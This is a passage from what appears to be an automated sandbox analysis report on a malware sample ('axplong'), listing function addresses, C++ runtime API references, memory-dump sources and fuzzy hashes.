                    • Opcode Fuzzy Hash: 9e18ae43efa262ab899841182ff182a4f34fe7d77519326da56073f2e0017db8
                    • Instruction Fuzzy Hash: BB01E17764821A62261C245C9C0663B17889FC3BF8729002BFD45E72C2EE4CEC4386A4
                    Function 00732E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcast
                    • String ID:
                    • API String ID: 32384418-0
                    • Opcode ID: 01c8aaad46a5f3f19005c322d117c2dd7344339514e962d2f8e4713fa26b9aff
                    • Instruction ID: b8c39be04396addad4c9257268382cfb360cc1da9f25f4787d6a5f2f7dbedca1
                    • Opcode Fuzzy Hash: 01c8aaad46a5f3f19005c322d117c2dd7344339514e962d2f8e4713fa26b9aff
                    • Instruction Fuzzy Hash: F1A1E2B1A0160AEFEB21DF64C84876AB7B9FF15314F048169E815D7243EB39EA05CBD1
                    Function 00732670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00732806
                    • ___std_exception_destroy.LIBVCRUNTIME ref: 007328A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy___std_exception_destroy
                    • String ID: P#s$P#s
                    • API String ID: 2970364248-3048905328
                    • Opcode ID: 91fba2c220c48daa94afd97f9ceb651fe80d38ac929c0034e2c330b1b66d476b
                    • Instruction ID: 71be58dae8cb7366eab1d51d6459b5993fffbc9379a837877f3310b1153f3d16
                    • Opcode Fuzzy Hash: 91fba2c220c48daa94afd97f9ceb651fe80d38ac929c0034e2c330b1b66d476b
                    • Instruction Fuzzy Hash: BE717071E00208DBDB04DFA8C885ADDFBB5FF59310F14812DE805A7242EB78A955CBA5
                    Function 00732AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00732B23
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#s$P#s$This function cannot be called on a default constructed task
                    • API String ID: 2659868963-4219113655
                    • Opcode ID: bc96861516b188d6b5bcf3e7a48e7270c8b1c5995ec8930fe77a3071d12b33d9
                    • Instruction ID: b797e42139534866eb157c91407010800fe30ba6f949408a54a5bd09daec0e94
                    • Opcode Fuzzy Hash: bc96861516b188d6b5bcf3e7a48e7270c8b1c5995ec8930fe77a3071d12b33d9
                    • Instruction Fuzzy Hash: 1EF0F671E1030CABC710EFA8E84599EB7ED9F05300F5081AEF80497202EB78AA59CB95
                    Function 00732440 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0073247E
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: 'ktd+y$P#s$P#s
                    • API String ID: 2659868963-3913168152
                    • Opcode ID: e8846774ddd4281305c3eb180b79eb4a6c84269134a3418f92409402ad9da903
                    • Instruction ID: 62a85aac4df2769ebe67715bc46401bf6ce6fc32cc035c81b56bccc53bc4979b
                    • Opcode Fuzzy Hash: e8846774ddd4281305c3eb180b79eb4a6c84269134a3418f92409402ad9da903
                    • Instruction Fuzzy Hash: 35F0A0B291020CABC714FAE8E805889B3ACDE15300B008A25FA44E7501FB78FA5887E1
                    Function 0076C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                    • Instruction ID: 2a07907df624845e59897b6b233fa5106ab29bb796c1538434d6c67d7b1b613c
                    • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                    • Instruction Fuzzy Hash: 66B148729002859FDB12CF68C895BBEBBE5EF55340F1481AADC8AEB341D63C9D41CB61
                    Function 0074BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Xtime_diff_to_millis2_xtime_get
                    • String ID:
                    • API String ID: 531285432-0
                    • Opcode ID: b40e31c2b88fd6d58c31caf35f55da4e95c1d096f6acf270acc4791d7ef79b84
                    • Instruction ID: 0b0655097348a4e9b9c8f4e07ae4118b6e8c198be9afb237e13756f56bcc7c81
                    • Opcode Fuzzy Hash: b40e31c2b88fd6d58c31caf35f55da4e95c1d096f6acf270acc4791d7ef79b84
                    • Instruction Fuzzy Hash: FF216071A01219EFDF51EFA4DC859BEBBB8EF08714F104069F601A7261DB78AD018BA1
                    Function 00747040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 0074726C
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: @.s$`zt
                    • API String ID: 3366076730-3213656910
                    • Opcode ID: 795de3b8b0914a7bc48fa9b9774ba050f9f9e74a60e314ab086ec445dbff41c0
                    • Instruction ID: 5995b0a9c8c0e069d767e3d23405f3c8ff28a6c0932d6e5ae033270a4f47965e
                    • Opcode Fuzzy Hash: 795de3b8b0914a7bc48fa9b9774ba050f9f9e74a60e314ab086ec445dbff41c0
                    • Instruction Fuzzy Hash: E7A136B0A01619CFDB25CFA8C88479EBBF1BF48710F19815AE819AB351E7799D01CB90
                    Function 0076F21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___free_lconv_mon
                    • String ID: 8"y$`'y
                    • API String ID: 3903695350-752720508
                    • Opcode ID: 205b229697aa8699bdc17c5d9e0217a6be05cdf488427efff51a582980eead8e
                    • Instruction ID: 4d42fdda6bccc7f5abb87f572fd01e27a471264e880e28e0897814c4f7e937bc
                    • Opcode Fuzzy Hash: 205b229697aa8699bdc17c5d9e0217a6be05cdf488427efff51a582980eead8e
                    • Instruction Fuzzy Hash: 8B313831600305EFEB21AB79E949B5A73E9BF40320F144429EC5BE7291DF79AC848F21
                    Function 00733930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 00733962
                    • __Mtx_init_in_situ.LIBCPMT ref: 007339A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: pBs
                    • API String ID: 3366076730-2700328003
                    • Opcode ID: 9d21390640b103d901f824c0584d682a613660758cd8e951a8f478d7786353ae
                    • Instruction ID: f25ea1a5fbff91ff42b63b95ae837ea8f44512d78cfb34a0bd4318f83c8860b9
                    • Opcode Fuzzy Hash: 9d21390640b103d901f824c0584d682a613660758cd8e951a8f478d7786353ae
                    • Instruction Fuzzy Hash: D84103B0501B05DFE720CF19C588B5ABBF4FF44315F148619E96A8B341E7B9EA15CB80
                    Function 00732520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00732552
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#s$P#s
                    • API String ID: 2659868963-3048905328
                    • Opcode ID: 9104099ae0adafbb2a69cc8750ed8bf1f811b80d170b7f493119d0d0c1295bf8
                    • Instruction ID: e53a173f1dba1d099c638061776f6576218201b9d2115eca4227709c81be5fdc
                    • Opcode Fuzzy Hash: 9104099ae0adafbb2a69cc8750ed8bf1f811b80d170b7f493119d0d0c1295bf8
                    • Instruction Fuzzy Hash: A3F0A771E1120DEBC714EFA8D84198EBBF4AF55300F1082AEE84567201EB755A59CBD9